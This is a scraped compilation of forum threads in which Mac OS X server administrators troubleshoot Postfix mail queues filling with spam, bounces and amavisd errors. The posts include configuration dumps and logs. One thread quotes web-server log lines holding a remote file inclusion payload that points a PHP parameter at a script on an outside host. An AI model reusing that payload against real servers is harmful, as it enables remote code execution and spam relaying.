Outgoing mail queue fills with spam

Similar Messages

• Mail Queue Filling Up - Spam?

  Hi All,
  Over the weekend the mail queue in SA filled up. This morning some users where complaining about outgoing messages not being delivered. When I checked the mail queue it had about 500 messages in it. All of them looked liked spam. When I deleted them, outgoing messages started being delivered.
  I have no idea why that would happen. Could it mean a hacked machine on the network? I've turned off all of my window's machines overnight to see what happens.
  here is my config file.
  mail:~ warnersmith$ postconf -n
  alias_maps = hash:/etc/aliases,hash:/var/mailman/data/aliases
  command_directory = /usr/sbin
  config_directory = /etc/postfix
  content_filter = smtp-amavis:[127.0.0.1]:10024
  daemon_directory = /usr/libexec/postfix
  debugpeerlevel = 2
  enableserveroptions = yes
  html_directory = no
  inet_interfaces = all
  localrecipientmaps =
  luser_relay = postofficebox
  mail_owner = postfix
  mailboxsizelimit = 0
  mailbox_transport = cyrus
  mailq_path = /usr/bin/mailq
  manpage_directory = /usr/share/man
  mapsrbldomains =
  messagesizelimit = 20971520
  mydestination = $myhostname,localhost.$mydomain,mail.sk.com,66.XXX.8.132,10.0.0.132,sk.com,skde sign.com
  mydomain = sk.com
  mydomain_fallback = localhost
  myhostname = sk.com
  mynetworks = 127.0.0.1/32,10.0.0.1/32,206.XXX.192.99
  mynetworks_style = host
  newaliases_path = /usr/bin/newaliases
  ownerrequestspecial = no
  queue_directory = /private/var/spool/postfix
  readme_directory = /usr/share/doc/postfix
  recipient_delimiter = +
  relayhost = mail.chrl.twtelecom.net
  sample_directory = /usr/share/doc/postfix/examples
  sendmail_path = /usr/sbin/sendmail
  setgid_group = postdrop
  smtpdclientrestrictions = permit_mynetworks hash:/etc/postfix/smtpdreject rejectrblclient sbl.spamhaus.org permit
  smtpdpw_server_securityoptions = gssapi,cram-md5,login
  smtpdrecipientrestrictions = permitsasl_authenticated,permit_mynetworks,reject_unauthdestination,permit
  smtpdsasl_authenable = yes
  smtpdtls_certfile = /etc/postfix/server.pem
  smtpdtls_keyfile = $smtpdtls_certfile
  smtpduse_pwserver = yes
  unknownlocal_recipient_rejectcode = 550
  MacBook Pro 2.0 GHz 1 GB RAM   Mac OS X (10.4.6)  

  Thanks Jeff. I think the code injection maybe it. I have the server set to relay all outgoing messages to our ISP's mail server. When I look at the messages in the mail queue, all of them seem to be bounce backs from the ISP (domain name does not exist.)
  When I look at the mail log for one the messages with the ID of 39E33163839, I see:
  Oct 10 13:20:11 mail postfix/smtpd[1697]: connect from unknown[10.0.0.45]
  Oct 10 13:20:11 mail postfix/smtpd[1697]: 5EB9115C71D: client=unknown[10.0.0.45]
  Oct 10 13:20:11 mail postfix/cleanup[1698]: 5EB9115C71D: message-id=<[email protected]>
  Oct 10 13:20:11 mail postfix/qmgr[4726]: 5EB9115C71D: from=<[email protected]>, size=1904, nrcpt=1 (queue active)
  Oct 10 20:11:02 mail postfix/qmgr[4726]: C6C32162E2F: from=, size=28300, nrcpt=1 (queue active)
  Oct 10 20:11:02 mail postfix/smtp[13214]: C6C32162E2F: host relay.mail.twtelecom.net[216.136.102.250] said: 450 <[email protected]>: Recipient address rejected: Domain not found (in reply to RCPT TO command)
  Oct 10 20:11:03 mail postfix/smtp[13214]: C6C32162E2F: to=<[email protected]>, relay=relay.mail.twtelecom.net[216.54.204.190], delay=3698, status=deferred (host relay.mail.twtelecom.net[216.54.204.190] said: 450 <[email protected]>: Recipient address rejected: Domain not found (in reply to RCPT TO command))
  Oct 10 20:11:49 mail postfix/smtpd[13189]: connect from c-24-147-6-229.hsd1.ma.comcast.net[24.147.6.229]
  Oct 10 20:11:50 mail postfix/smtpd[13189]: 37C60163818: client=c-24-147-6-229.hsd1.ma.comcast.net[24.147.6.229]
  Oct 10 20:11:50 mail postfix/cleanup[13178]: 37C60163818: message-id=<000001c6ecc9$d4d5c980$0100007f@Alicia>
  Oct 10 20:11:51 mail postfix/qmgr[4726]: 37C60163818: from=<[email protected]>, size=26446, nrcpt=1 (queue active)
  Oct 10 20:11:51 mail postfix/smtpd[13189]: disconnect from c-24-147-6-229.hsd1.ma.comcast.net[24.147.6.229]
  Oct 10 20:11:55 mail postfix/smtpd[13182]: connect from localhost[127.0.0.1]
  Oct 10 20:11:56 mail postfix/smtpd[13182]: F29EA163837: client=localhost[127.0.0.1]
  Oct 10 20:11:56 mail postfix/cleanup[13178]: F29EA163837: message-id=<000001c6ecc9$d4d5c980$0100007f@Alicia>
  Oct 10 20:11:56 mail postfix/smtpd[13182]: disconnect from localhost[127.0.0.1]
  Oct 10 20:11:56 mail postfix/qmgr[4726]: F29EA163837: from=<[email protected]>, size=27040, nrcpt=1 (queue active)
  Oct 10 20:11:56 mail postfix/smtp[13179]: 37C60163818: to=<[email protected]>, relay=127.0.0.1[127.0.0.1], delay=6, status=bounced (host 127.0.0.1[127.0.0.1] said: 550 5.7.1 Message content rejected, UBE, id=13135-02 (in reply to end of DATA command))
  Oct 10 20:11:56 mail postfix/cleanup[13178]: 39E33163839: message-id=<[email protected]>
  Oct 10 20:11:56 mail postfix/qmgr[4726]: 39E33163839: from=, size=28311, nrcpt=1 (queue active)
  Oct 10 20:11:56 mail postfix/qmgr[4726]: 37C60163818: removed
  Oct 10 20:11:56 mail postfix/pipe[13184]: F29EA163837: to=<[email protected]>, relay=cyrus, delay=1, status=sent (sk.com)
  Oct 10 20:11:56 mail postfix/qmgr[4726]: F29EA163837: removed
  Oct 10 20:11:56 mail postfix/smtp[13214]: 39E33163839: host relay.mail.twtelecom.net[216.54.204.190] said: 450 <[email protected]>: Recipient address rejected: Domain not found (in reply to RCPT TO command)
  Oct 10 20:11:56 mail postfix/smtp[13214]: 39E33163839: to=<[email protected]>, relay=relay.mail.twtelecom.net[216.136.95.10], delay=0, status=deferred (host relay.mail.twtelecom.net[216.136.95.10] said: 450 <[email protected]>: Recipient address rejected: Domain not found (in reply to RCPT TO command))
  When I look at the HTTPD logs for that same minute, I see:
  69.231.131.52 - - [10/Oct/2006:14:20:11 -0400] "GET /pages/facility_02.html HTTP/1.1" 200 12193
  216.120.232.145 - - [10/Oct/2006:20:11:09 -0400] "GET //components/comsitemap/sitemap.xml.php?mosConfig_absolutepath=http://71.132.219.9/omg/remote.txt? HTTP/1.1" 404 -
  194.52.202.141 - - [10/Oct/2006:20:11:36 -0400] "GET //components/comsitemap/sitemap.xml.php?mosConfig_absolutepath=http://71.132.219.9/omg/remote.txt? HTTP/1.1" 404 -
  68.71.20.37 - - [11/Oct/2006:10:20:11 -0400] "GET /images/leisure_image.3.jpg HTTP/1.1" 200 5338
  68.71.20.37 - - [11/Oct/2006:10:20:11 -0400] "GET /images/leisure_image.4.jpg HTTP/1.1" 200 6872
  68.71.20.37 - - [11/Oct/2006:10:20:11 -0400] "GET /images/leisure_image.5.jpg HTTP/1.1" 200 3360
  The line "//components/comsitemap/sitemap.xml.php?mosConfig_absolutepath=http://71.132.219.9/omg/remote.txt? HTTP/1.1" 404 -" seem to be that code injection. We don't have a file named sitemap.xml.php on our website.
  Am I correct that this is a code injection?
  I have three site running on this server. One is a plain old static site for the company it does not use PHP. One is webmail that came with OS X. The final one is an file storage site that does use PHP. It's a commercial code called Copper Project. I've turned off the site overnight to see if this still happens.
  The link in in Jeff's post seems to suggest a simple fix. However, I know nothing about PHP programing, so this is beyond me.
  Thanks
  Henry
  MacBook Pro 2.0 GHz 1 GB RAM   Mac OS X (10.4.6)  

• Mail queue filling with errors, is something broken?

  Back in SL, I was able to just look at the queue in server app and if it ever had anything in it, I knew it was a problem and I usually could deal with it.
  But in ML, you have to issue "mailq" in terminal to see it. So I did that a lot when first set up, and everything seemed fine.
  I just checked it recently and found hundreds of messages like this:
  0C8AA2B7E2D6
  9315 Sun Jan  4 09:14:13  [email protected]
  (host 127.0.0.1[127.0.0.1] said: 451 4.5.0 Error in processing, id=76490-02-4, quar+notif FAILED: temporarily unable to quarantine: 451 4.5.0 Local delivery(1) to /Library/Server/Mail/Data/scanner/virusmails failed: Mailbox file /Library/Server/Mail/Data/scanner/virusmails is executable, refuse to deliver at (eval 102) line 219., id=76490-02-4 at /Applications/Server.app/Contents/ServerRoot/usr/bin/amavisd line 15343. (in reply to end of DATA command))
  [email protected]
  I delete them and it fills up again.
  Can anyone please tell me what's happening here and how to fix it?
  Thank a bunch,
  Scott

  Here it is:
  prepress:~ server2$ ls -dl /L*/Server/M*/D*/*/virus*
  -rwxr-x---  1 _amavisd  _amavisd  548758857 Dec 18 10:42 /Library/Server/Mail/Data/scanner/virusmails
  prepress:~ server2$
  Thanks Linc!

• At What Time are Device Queues Filled with Updates?

  At What Time are Device Queues Filled with Updates?

  As you can see from other postings on this forum, we're currently experiencing upload problems for very large files, especially over slower internet connections. I suggest that you try to upload these files to your account at https://cloud.acrobat.com and then create Public links from there. You can then distribute the Public links for your users to access the files.

• Mail queue filling up, delivery real slow

  mail server is: 10.4.2 running on a dual 2 GHz Xserve 1 gig RAM
  2 hard drives. 1 boot, 1 mail store
  my mail queue is filling up with messages that can't be delivered. bad address usually. not sure why they make into the queue in the first place.
  The queue reaches as high a 7000+ messages.
  This is really killing my server. Can anyone shed some light??
  here is postconf output:
  2bounce_notice_recipient = postmaster
  access_map_reject_code = 554
  address_verify_default_transport = $default_transport
  address_verify_local_transport = $local_transport
  address_verify_map =
  address_verify_negative_cache = yes
  address_verify_negative_expire_time = 3d
  address_verify_negative_refresh_time = 3h
  address_verify_poll_count = 3
  address_verify_poll_delay = 3s
  address_verify_positive_expire_time = 31d
  address_verify_positive_refresh_time = 7d
  address_verify_relay_transport = $relay_transport
  address_verify_relayhost = $relayhost
  address_verify_sender = postmaster
  address_verify_service_name = verify
  address_verify_transport_maps = $transport_maps
  address_verify_virtual_transport = $virtual_transport
  alias_database = hash:/etc/aliases
  alias_maps = hash:/etc/aliases,hash:/var/mailman/data/aliases
  allow_mail_to_commands = alias, forward
  allow_mail_to_files = alias, forward
  allow_min_user = no
  allow_percent_hack = yes
  allow_untrusted_routing = no
  alternate_config_directories =
  always_bcc =
  append_at_myorigin = yes
  append_dot_mydomain = yes
  application_event_drain_time = 100s
  backwards_bounce_logfile_compatibility = yes
  berkeley_db_create_buffer_size = 16777216
  berkeley_db_read_buffer_size = 131072
  best_mx_transport =
  biff = yes
  body_checks =
  body_checks_size_limit = 51200
  bounce_notice_recipient = postmaster
  bounce_queue_lifetime = 5d
  bounce_service_name = bounce
  bounce_size_limit = 50000
  broken_sasl_auth_clients = no
  canonical_maps =
  cleanup_service_name = cleanup
  command_directory = /usr/sbin
  command_expansion_filter = 1234567890!@%-_=+:,./abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
  command_time_limit = 1000s
  config_directory = /etc/postfix
  content_filter = smtp-amavis:[127.0.0.1]:10024
  daemon_directory = /usr/libexec/postfix
  daemon_timeout = 18000s
  debug_peer_level = 2
  debug_peer_list =
  default_database_type = hash
  default_delivery_slot_cost = 5
  default_delivery_slot_discount = 50
  default_delivery_slot_loan = 3
  default_destination_concurrency_limit = 6
  default_destination_recipient_limit = 50
  default_extra_recipient_limit = 1000
  default_minimum_delivery_slots = 3
  default_privs = nobody
  default_process_limit = 20
  default_rbl_reply = $rbl_code Service unavailable; $rbl_class [$rbl_what] blocked using $rbl_domain${rbl_reason?; $rbl_reason}
  default_recipient_limit = 10000
  default_transport = smtp
  default_verp_delimiters = +=
  defer_code = 450
  defer_service_name = defer
  defer_transports =
  delay_notice_recipient = postmaster
  delay_warning_time = 0h
  deliver_lock_attempts = 20
  deliver_lock_delay = 1s
  disable_dns_lookups = no
  disable_mime_input_processing = no
  disable_mime_output_conversion = no
  disable_verp_bounces = no
  disable_vrfy_command = no
  dont_remove = 0
  double_bounce_sender = double-bounce
  duplicate_filter_limit = 1000
  empty_address_recipient = MAILER-DAEMON
  enable_errors_to = no
  enable_original_recipient = yes
  enable_server_options = yes
  error_notice_recipient = postmaster
  error_service_name = error
  expand_owner_alias = no
  export_environment = TZ MAIL_CONFIG
  fallback_relay =
  fallback_transport =
  fast_flush_domains = $relay_domains
  fast_flush_purge_time = 7d
  fast_flush_refresh_time = 12h
  fault_injection_code = 0
  flush_service_name = flush
  fork_attempts = 5
  fork_delay = 1s
  forward_expansion_filter = 1234567890!@%-_=+:,./abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
  forward_path = $home/.forward${recipient_delimiter}${extension}, $home/.forward
  hash_queue_depth = 1
  hash_queue_names = incoming, active, deferred, bounce, defer, flush, hold, trace
  header_address_token_limit = 10240
  header_checks =
  header_size_limit = 102400
  helpful_warnings = yes
  home_mailbox =
  hopcount_limit = 50
  html_directory = no
  ignore_mx_lookup_error = no
  import_environment = MAIL_CONFIG MAIL_DEBUG MAIL_LOGTAG TZ XAUTHORITY DISPLAY
  in_flow_delay = 1s
  inet_interfaces = all
  initial_destination_concurrency = 4
  invalid_hostname_reject_code = 501
  ipc_idle = 100s
  ipc_timeout = 3600s
  ipc_ttl = 1000s
  line_length_limit = 2048
  lmtp_cache_connection = yes
  lmtp_connect_timeout = 0s
  lmtp_data_done_timeout = 600s
  lmtp_data_init_timeout = 120s
  lmtp_data_xfer_timeout = 180s
  lmtp_destination_concurrency_limit = $default_destination_concurrency_limit
  lmtp_destination_recipient_limit = $default_destination_recipient_limit
  lmtp_lhlo_timeout = 300s
  lmtp_mail_timeout = 300s
  lmtp_quit_timeout = 300s
  lmtp_rcpt_timeout = 300s
  lmtp_rset_timeout = 120s
  lmtp_sasl_auth_enable = no
  lmtp_sasl_password_maps =
  lmtp_sasl_security_options = noplaintext, noanonymous
  lmtp_send_xforward_command = no
  lmtp_skip_quit_response = no
  lmtp_tcp_port = 24
  lmtp_xforward_timeout = 300s
  local_command_shell =
  local_destination_concurrency_limit = 2
  local_destination_recipient_limit = 1
  local_recipient_maps =
  local_transport = local:$myhostname
  luser_relay = emailadmin
  mail_name = Postfix
  mail_owner = postfix
  mail_release_date = 20040915
  mail_spool_directory = /var/mail
  mail_version = 2.1.5
  mailbox_command =
  mailbox_command_maps =
  mailbox_delivery_lock = flock
  mailbox_size_limit = 0
  mailbox_transport = cyrus
  mailq_path = /usr/bin/mailq
  manpage_directory = /usr/share/man
  maps_rbl_domains =
  maps_rbl_reject_code = 554
  masquerade_classes = envelope_sender, header_sender, header_recipient
  masquerade_domains =
  masquerade_exceptions =
  max_idle = 100s
  max_use = 100
  maximal_backoff_time = 2700s
  maximal_queue_lifetime = 36h
  message_size_limit = 16777216
  mime_boundary_length_limit = 2048
  mime_header_checks = $header_checks
  mime_nesting_limit = 100
  minimal_backoff_time = 900s
  multi_recipient_bounce_reject_code = 550
  mydestination = $myhostname,localhost.$mydomain,myDomain.com,mail.myDomain.com
  mydomain = myDomain.com
  mydomain_fallback = localhost
  myhostname = myDomain.com
  mynetworks = 127.0.0.1/32,10.0.0.0/24,10.0.8.0/24,10.0.1.0/24
  mynetworks_style = host
  myorigin = $myhostname
  nested_header_checks = $header_checks
  newaliases_path = /usr/bin/newaliases
  non_fqdn_reject_code = 504
  notify_classes = resource, software
  owner_request_special = no
  parent_domain_matches_subdomains = debug_peer_list,fast_flush_domains,mynetworks,permit_mx_backup_networks,qmqpd_a uthorized_clients,relay_domains,smtpd_access_maps
  permit_mx_backup_networks =
  pickup_service_name = pickup
  prepend_delivered_header = command, file, forward
  process_id_directory = pid
  propagate_unmatched_extensions = canonical, virtual
  proxy_interfaces =
  proxy_read_maps = $local_recipient_maps $mydestination $virtual_alias_maps $virtual_alias_domains $virtual_mailbox_maps $virtual_mailbox_domains $relay_recipient_maps $relay_domains $canonical_maps $sender_canonical_maps $recipient_canonical_maps $relocated_maps $transport_maps $mynetworks
  qmgr_clog_warn_time = 300s
  qmgr_fudge_factor = 100
  qmgr_message_active_limit = 20000
  qmgr_message_recipient_limit = 20000
  qmgr_message_recipient_minimum = 10
  qmqpd_authorized_clients =
  qmqpd_error_delay = 1s
  qmqpd_timeout = 300s
  queue_directory = /private/var/spool/postfix
  queue_file_attribute_count_limit = 100
  queue_minfree = 0
  queue_run_delay = 900s
  queue_service_name = qmgr
  rbl_reply_maps =
  readme_directory = /usr/share/doc/postfix
  receive_override_options =
  recipient_bcc_maps =
  recipient_canonical_maps =
  recipient_delimiter = +
  reject_code = 554
  relay_clientcerts =
  relay_destination_concurrency_limit = $default_destination_concurrency_limit
  relay_destination_recipient_limit = $default_destination_recipient_limit
  relay_domains = $mydestination
  relay_domains_reject_code = 554
  relay_recipient_maps =
  relay_transport = relay
  relayhost =
  relocated_maps =
  require_home_directory = no
  resolve_dequoted_address = yes
  resolve_null_domain = no
  rewrite_service_name = rewrite
  sample_directory = /usr/share/doc/postfix/examples
  sender_based_routing = no
  sender_bcc_maps =
  sender_canonical_maps =
  sendmail_path = /usr/sbin/sendmail
  service_throttle_time = 60s
  setgid_group = postdrop
  show_user_unknown_table_name = yes
  showq_service_name = showq
  smtp_always_send_ehlo = yes
  smtp_bind_address =
  smtp_connect_timeout = 30s
  smtp_data_done_timeout = 600s
  smtp_data_init_timeout = 120s
  smtp_data_xfer_timeout = 180s
  smtp_defer_if_no_mx_address_found = no
  smtp_destination_concurrency_limit = $default_destination_concurrency_limit
  smtp_destination_recipient_limit = $default_destination_recipient_limit
  smtp_enforce_tls = no
  smtp_helo_name = $myhostname
  smtp_helo_timeout = 300s
  smtp_host_lookup = dns
  smtp_line_length_limit = 990
  smtp_mail_timeout = 300s
  smtp_mx_address_limit = 0
  smtp_mx_session_limit = 2
  smtp_never_send_ehlo = no
  smtp_pix_workaround_delay_time = 10s
  smtp_pix_workaround_threshold_time = 500s
  smtp_quit_timeout = 300s
  smtp_quote_rfc821_envelope = yes
  smtp_randomize_addresses = yes
  smtp_rcpt_timeout = 300s
  smtp_rset_timeout = 120s
  smtp_sasl_auth_enable = no
  smtp_sasl_password_maps =
  smtp_sasl_security_options = noplaintext, noanonymous
  smtp_sasl_tls_security_options = $var_smtp_sasl_opts
  smtp_sasl_tls_verified_security_options = $var_smtp_sasl_tls_opts
  smtp_send_xforward_command = no
  smtp_skip_5xx_greeting = yes
  smtp_skip_quit_response = yes
  smtp_starttls_timeout = 300s
  smtp_tls_CAfile =
  smtp_tls_CApath =
  smtp_tls_cert_file =
  smtp_tls_cipherlist =
  smtp_tls_dcert_file =
  smtp_tls_dkey_file = $smtp_tls_dcert_file
  smtp_tls_enforce_peername = yes
  smtp_tls_key_file = $smtp_tls_cert_file
  smtp_tls_loglevel = 0
  smtp_tls_note_starttls_offer = no
  smtp_tls_per_site =
  smtp_tls_scert_verifydepth = 5
  smtp_tls_session_cache_database =
  smtp_tls_session_cache_timeout = 3600s
  smtp_use_tls = no
  smtp_xforward_timeout = 300s
  smtpd_authorized_verp_clients = $authorized_verp_clients
  smtpd_authorized_xclient_hosts =
  smtpd_authorized_xforward_hosts =
  smtpd_banner = $myhostname ESMTP $mail_name
  smtpd_client_connection_count_limit = 50
  smtpd_client_connection_limit_exceptions = $mynetworks
  smtpd_client_connection_rate_limit = 0
  smtpd_client_restrictions = check_recipient_access hash:/etc/postfix/access, permit_sasl_authenticated, permit_mynetworks, check_sender_access hash:/etc/postfix/whiteList, reject_invalid_hostname, reject_non_fqdn_sender, reject_non_fqdn_recipient, reject_rbl_client dnsbl.njabl.org, reject_rbl_client sbl-xbl.spamhaus.org, reject_rbl_client bl.spamcop.net, reject_rbl_client cbl.abuseat.org
  smtpd_data_restrictions =
  smtpd_delay_reject = yes
  smtpd_enforce_tls = no
  smtpd_error_sleep_time = 1s
  smtpd_etrn_restrictions =
  smtpd_expansion_filter = \t\40!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghi jklmnopqrstuvwxyz{|}~
  smtpd_hard_error_limit = 20
  smtpd_helo_required = no
  smtpd_helo_restrictions =
  smtpd_history_flush_threshold = 100
  smtpd_junk_command_limit = 100
  smtpd_noop_commands =
  smtpd_null_access_lookup_key =
  smtpd_policy_service_max_idle = 300s
  smtpd_policy_service_max_ttl = 1000s
  smtpd_policy_service_timeout = 100s
  smtpd_proxy_ehlo = $myhostname
  smtpd_proxy_filter =
  smtpd_proxy_timeout = 100s
  smtpd_pw_server_security_options = login,plain,cram-md5,gssapi
  smtpd_recipient_limit = 1000
  smtpd_recipient_overshoot_limit = 1000
  smtpd_recipient_restrictions = check_recipient_access hash:/etc/postfix/access, permit_mynetworks, permit_sasl_authenticated, reject_invalid_hostname, reject_non_fqdn_sender, reject_non_fqdn_recipient, reject_unknown_sender_domain, reject_unauth_destination, check_sender_access hash:/etc/postfix/whiteList
  smtpd_reject_unlisted_recipient = yes
  smtpd_reject_unlisted_sender = no
  smtpd_restriction_classes =
  smtpd_sasl_application_name = smtpd
  smtpd_sasl_auth_enable = yes
  smtpd_sasl_exceptions_networks =
  smtpd_sasl_local_domain =
  smtpd_sasl_security_options = noanonymous
  smtpd_sasl_tls_security_options = $smtpd_sasl_security_options
  smtpd_sender_login_maps =
  smtpd_sender_restrictions =
  smtpd_soft_error_limit = 10
  smtpd_starttls_timeout = 300s
  smtpd_timeout = 300s
  smtpd_tls_CAfile =
  smtpd_tls_CApath =
  smtpd_tls_ask_ccert = no
  smtpd_tls_auth_only = no
  smtpd_tls_ccert_verifydepth = 5
  smtpd_tls_cert_file = /etc/certificates/mail.myDomain.com.crt
  smtpd_tls_cipherlist =
  smtpd_tls_dcert_file =
  smtpd_tls_dh1024_param_file =
  smtpd_tls_dh512_param_file =
  smtpd_tls_dkey_file = $smtpd_tls_dcert_file
  smtpd_tls_key_file = /etc/certificates/mail.myDomain.com.key
  smtpd_tls_loglevel = 2
  smtpd_tls_received_header = no
  smtpd_tls_req_ccert = no
  smtpd_tls_session_cache_database =
  smtpd_tls_session_cache_timeout = 3600s
  smtpd_tls_wrappermode = no
  smtpd_use_pw_server = yes
  smtpd_use_tls = yes
  soft_bounce = no
  stale_lock_time = 500s
  strict_7bit_headers = no
  strict_8bitmime = no
  strict_8bitmime_body = no
  strict_mime_encoding_domain = no
  strict_rfc821_envelopes = no
  sun_mailtool_compatibility = no
  swap_bangpath = yes
  syslog_facility = mail
  syslog_name = postfix
  tls_daemon_random_bytes = 32
  tls_daemon_random_source =
  tls_random_bytes = 32
  tls_random_exchange_name = ${config_directory}/prng_exch
  tls_random_prng_update_period = 60s
  tls_random_reseed_period = 3600s
  tls_random_source =
  trace_service_name = trace
  transport_maps =
  transport_retry_time = 60s
  trigger_timeout = 10s
  undisclosed_recipients_header = To: undisclosed-recipients:;
  unknown_address_reject_code = 450
  unknown_client_reject_code = 450
  unknown_hostname_reject_code = 450
  unknown_local_recipient_reject_code = 550
  unknown_relay_recipient_reject_code = 550
  unknown_virtual_alias_reject_code = 550
  unknown_virtual_mailbox_reject_code = 550
  unverified_recipient_reject_code = 450
  unverified_sender_reject_code = 450
  verp_delimiter_filter = -=+
  virtual_alias_domains = $virtual_alias_maps
  virtual_alias_expansion_limit = 1000
  virtual_alias_maps = hash:/etc/postfix/virtual,hash:/var/mailman/data/virtual-mailman
  virtual_alias_recursion_limit = 1000
  virtual_destination_concurrency_limit = $default_destination_concurrency_limit
  virtual_destination_recipient_limit = $default_destination_recipient_limit
  virtual_gid_maps =
  virtual_mailbox_base =
  virtual_mailbox_domains = hash:/etc/postfix/virtual_domains
  virtual_mailbox_limit = 51200000
  virtual_mailbox_lock = fcntl
  virtual_mailbox_maps =
  virtual_minimum_uid = 100
  virtual_transport = lmtp:unix:/Volumes/Mail/imap/socket/lmtp
  virtual_uid_maps =

  I do have a few Windows clients. They have up to date virus protection but they could very well be infected with some malware. I haven't had the chance to run SpyBot on them.
  Sorry for the long postconf output.
  I did requeue all the messages with postsuper -r. I also put them all on hold (postsuper -h) which allowed for new messages to be delivered as usual. Deleting the queue was not an option. I am pretty sure now that it was a spam dictionary attack. But I am still concerned that this would effectively bring the server down.
  I looked into recipient restrictions but don't see any easy way to maintain an accurate list of my users. Is there a way to pull them from the LDAP directory? I guess I could do that with a perl script, shouldn't be too hard. Is there an easier way? Something built in?
  Anyway the server is fine now. As I said I put all the messages on hold then slowly released them back into the active queue. Once the server was able to get over its hang up it chewed through the remaining messages ok. This still brought my server down pretty much the entire day. Not acceptable in most countries.
  Any other ideas are welcome!
  Thanks,
  Josh
  shorter postconf output:
  alias_maps = hash:/etc/aliases,hash:/var/mailman/data/aliases
  always_bcc =
  bouncequeuelifetime = 4h
  command_directory = /usr/sbin
  config_directory = /etc/postfix
  content_filter = smtp-amavis:[127.0.0.1]:10024
  daemon_directory = /usr/libexec/postfix
  debugpeerlevel = 2
  defaultdestination_concurrencylimit = 6
  defaultprocesslimit = 20
  enableserveroptions = yes
  inet_interfaces = all
  initialdestinationconcurrency = 15
  localrecipientmaps =
  luser_relay = emailadmin
  mail_owner = postfix
  mailboxsizelimit = 0
  mailbox_transport = cyrus
  mailq_path = /usr/bin/mailq
  manpage_directory = /usr/share/man
  mapsrbldomains =
  maximalbackofftime = 2700s
  maximalqueuelifetime = 36h
  messagesizelimit = 16777216
  minimalbackofftime = 900s
  mydestination = $myhostname,localhost.$mydomain,myDomain.com
  mydomain_fallback = localhost
  myhostname = thestranger.com
  mynetworks = 127.0.0.1/32,10.0.0.0/24,10.0.8.0/24,10.0.1.0/24
  mynetworks_style = host
  newaliases_path = /usr/bin/newaliases
  ownerrequestspecial = no
  queue_directory = /private/var/spool/postfix
  queuerundelay = 900s
  readme_directory = /usr/share/doc/postfix
  recipient_delimiter = +
  relayhost =
  sample_directory = /usr/share/doc/postfix/examples
  sendmail_path = /usr/sbin/sendmail
  setgid_group = postdrop
  smtpconnecttimeout = 15s
  smtphelotimeout = 30s
  smtpdclientrestrictions = checkrecipientaccess hash:/etc/postfix/access, permitsaslauthenticated, permit_mynetworks, checksenderaccess hash:/etc/postfix/whiteList, rejectinvalidhostname, rejectnon_fqdnsender, rejectnon_fqdnrecipient, rejectrblclient dnsbl.njabl.org, rejectrblclient sbl-xbl.spamhaus.org, rejectrblclient bl.spamcop.net, rejectrblclient cbl.abuseat.org
  smtpdenforcetls = no
  smtpdpw_server_securityoptions = login,plain,cram-md5,gssapi
  smtpdrecipientrestrictions = checkrecipientaccess hash:/etc/postfix/access, permit_mynetworks, permitsaslauthenticated, rejectinvalidhostname, rejectnon_fqdnsender, rejectnon_fqdnrecipient, rejectunknown_senderdomain, rejectunauthdestination, checksenderaccess hash:/etc/postfix/whiteList
  smtpdsasl_authenable = yes
  smtpdtls_certfile = /etc/certificates//myDomain.com.crt
  smtpdtls_keyfile = /etc/certificates/myDomain.com.key
  smtpdtlsloglevel = 2
  smtpduse_pwserver = yes
  smtpdusetls = yes
  unknownlocal_recipient_rejectcode = 550
  virtualaliasmaps = hash:/etc/postfix/virtual,hash:/var/mailman/data/virtual-mailman
  virtualmailboxdomains = hash:/etc/postfix/virtual_domains
  virtual_transport = lmtp:unix:/Volumes/Mail/imap/socket/lmtp

• Mail queue filling up - Delivery Temporarily Suspended Connection Refused

  About 2 hours ago we stopped getting any email from our server. The mail queue is filling up. If I click on one of the messages in queue, it gives me a message of "delivery temporarily suspended: connect to 127.0.0.1[127.0.0.1]: connection refused".
  What happened????
  Thanks,
  Robert

  My configuration was running fine for months but suddenly every night amavisd stops running (I suppose after mailbfr ran). I have to launch amavisd manually with +sudo /bin/launchctl load -w /System/Library/LaunchDaemons/org.amavis.amavisd.plist+ every day.
  Maybe something is wrong with my org.amavis.amavisd.plist? Here is it:
  <?xml version="1.0" encoding="UTF-8"?>
  <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
  <plist version="1.0">
  <dict>
  <key>Label</key>
  <string>org.amavis.amavisd</string>
  <key>OnDemand</key>
  <false/>
  <key>Program</key>
  <string>/usr/bin/amavisd</string>
  <key>ProgramArguments</key>
  <array>
  <string>amavisd</string>
  <string>foreground</string>
  </array>
  <key>ServiceIPC</key>
  <false/>
  <key>UserName</key>
  <string>_amavisd</string>
  </dict>
  </plist>

• Problem Mail program & Outgoing Mail Server - Problem with Earthlink

  I had Earthlink POP / SMTP ( In/Out ) Mail server and mac Mail set up when I pulled the power plug on PMG4 due to freeze up !
  Now have no contents in mac Mail program In/Out/Sent/Draft on the PMG4 hardrive or the external Lacie brick back-up hardrive. I am told by Earthlink this is because I had the " don't save email copy on server " box checked in the Mail/Add account/Advanced section.
  Any idea how I can retieve my email folders ?
  Also cannot get rid of 6 account names listed erroneously under Mail/Preferences/Account/Accounts Information/outgoing mail server ! And yet there is only one account listed when the accounts button is pushed. This is making it impossible to connect to the earthlink server ! Earthlink says everythings fine on their end and I have the correct Server Port number entered ! Earthlink says it's a problem with macMail !
  Help !

  This is no longer an issue

• Mac mail outgoing mail not working with wildblue gmail account

  My outgoing mail keeps saying offline. Cannot connect on the default ports. Tried changing ports, with and without SSL. Anybody have any solution?

  I've recreated the account multiple times and finally have mail coming through under an "All Mail" label under "Gmail" on the left hand side of the application. The one thing I did do differently was uncheck the SSL box in advanced settings, save changes, recheck the SSL box, save changes. Mail started working after that.
  Before this problem existed, I had [Gmail] in the "imap prefix" box in advanced settings in order to get rid of the gmail labels. I did this because I only wanted the Inbox and Sent Items to show in the far left. Right now, i'm only able to view my mail under an all mail folder beneath a Gmail Folder on the left had side. Can I get rid of all these folders and simply use my inbox and sent items icons?
  Thanks,
  Ryan
  Thanks in advance.

• Queue filling with outgoing spam, how do I stop it?

  My queue has lately filled up with mail intended to go out as mail from [email protected] or [email protected], and the like.
  I run Wordpress sites on this server and I updated all versions, fixed all folder permissions and changed all passwords. It stopped for a while after that, but it's back again.
  I've checked all Wordpress logins and found no unauthorized IPs logging in. Can't find anything in the FTP or access logs that looks amiss.
